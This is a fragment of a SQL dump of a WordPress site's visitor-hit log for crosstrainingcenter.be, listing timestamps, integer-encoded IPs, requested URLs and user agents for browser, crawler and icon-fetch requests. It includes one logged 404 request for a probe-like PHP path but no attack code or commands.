(73140, 1495227835.516642, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73141, 1495227835.973197, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73142, 1495227836.397015, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73143, 1495227836.831274, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73144, 1495227837.379081, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73145, 1495227837.856229, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73146, 1495227838.306799, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73147, 1495228695.650437, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73148, 1495228700.027306, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73149, 1495231551.461217, 3024883609, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73150, 1495238765.814547, 2733899714, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://www.majestic12.co.uk/bot.php?+)'),
(73151, 1495239510.746234, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73152, 1495247410.674940, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73153, 1495253800.087943, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73154, 1495254378.026489, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73155, 1495257586.909197, 3652617387, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73156, 1495259966.584620, 632825899, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73157, 1495259985.870350, 632825899, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73158, 1495259986.422664, 632825899, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73159, 1495259986.898638, 632825899, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73160, 1495259987.471610, 632825899, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73161, 1495259988.026755, 632825899, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73162, 1495259988.465160, 632825899, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73163, 1495259988.917435, 632825899, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73164, 1495259990.323914, 632825899, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73165, 1495259990.773017, 632825899, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73166, 1495260706.290444, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(73167, 1495260706.735394, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73168, 1495260707.142280, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73169, 1495260707.550581, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73170, 1495260708.499921, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73171, 1495260709.235473, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73172, 1495260709.679276, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73173, 1495260710.130304, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73174, 1495260710.615128, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73175, 1495260711.129094, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73176, 1495260711.642243, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73177, 1495260712.328094, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73178, 1495260712.914327, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73179, 1495260713.548978, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73180, 1495265838.396833, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73181, 1495265839.089240, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73182, 1495265839.517480, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73183, 1495265839.951047, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73184, 1495265840.488345, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73185, 1495265840.918356, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73186, 1495265841.385306, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73187, 1495265841.849434, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73188, 1495265842.307474, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73189, 1495265842.797462, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73190, 1495265843.203632, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73191, 1495265843.689496, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73192, 1495265844.130711, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73193, 1495265844.551899, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73194, 1495268418.821964, 1123635016, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73195, 1495268420.024130, 1123635091, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73196, 1495269011.970364, 3154448177, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73197, 1495269012.553130, 3154448177, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73198, 1495269013.084942, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73199, 1495269013.597755, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73200, 1495269014.062562, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73201, 1495269014.701714, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73202, 1495269015.247158, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73203, 1495269015.717877, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73204, 1495269016.179701, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73205, 1495269016.656358, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73206, 1495269017.124699, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73207, 1495269568.751320, 3154448177, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73208, 1495269569.334491, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73209, 1495269569.810637, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73210, 1495269570.282621, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73211, 1495269570.776344, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73212, 1495269571.258745, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73213, 1495269571.840633, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73214, 1495269572.320015, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73215, 1495269572.812583, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73216, 1495269573.278413, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73217, 1495269573.731573, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73218, 1495269852.457339, 3154448177, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73219, 1495269853.032213, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73220, 1495269853.484582, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73221, 1495269853.945604, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73222, 1495269854.396266, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73223, 1495269854.840994, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73224, 1495269855.412895, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73225, 1495269855.869270, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73226, 1495269856.337717, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73227, 1495269856.788748, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73228, 1495269857.243900, 3154448177, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73229, 1495274406.228382, 3652617288, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73230, 1495275730.540353, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73231, 1495276932.009511, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73232, 1495280647.054954, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73233, 1495280649.030527, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73234, 1495280649.513905, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73235, 1495280649.952445, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73236, 1495280650.457814, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73237, 1495280650.884889, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73238, 1495280651.330912, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73239, 1495280651.869516, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73240, 1495280652.356800, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73241, 1495280652.892207, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73242, 1495280653.397920, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73243, 1495280654.008983, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73244, 1495280654.509677, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73245, 1495280655.000005, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73246, 1495281513.573152, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73247, 1495286732.480948, 1123635091, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73248, 1495289781.835366, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73249, 1495294440.114742, 3039911297, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/indes.php', 'http://crosstrainingcenter.be/wp-includes/indes.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(73250, 1495297414.251645, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73251, 1495299532.660071, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73252, 1495306906.695319, 1837876689, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G928F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(73253, 1495306909.007491, 1837876689, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G928F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(73254, 1495306915.594839, 1837876689, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G928F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(73255, 1495307441.708633, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73256, 1495307442.213714, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73257, 1495307442.736870, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73258, 1495307443.151561, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73259, 1495307443.566094, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73260, 1495307443.979552, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73261, 1495307444.465651, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73262, 1495307444.899159, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73263, 1495307445.319347, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73264, 1495307445.829657, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
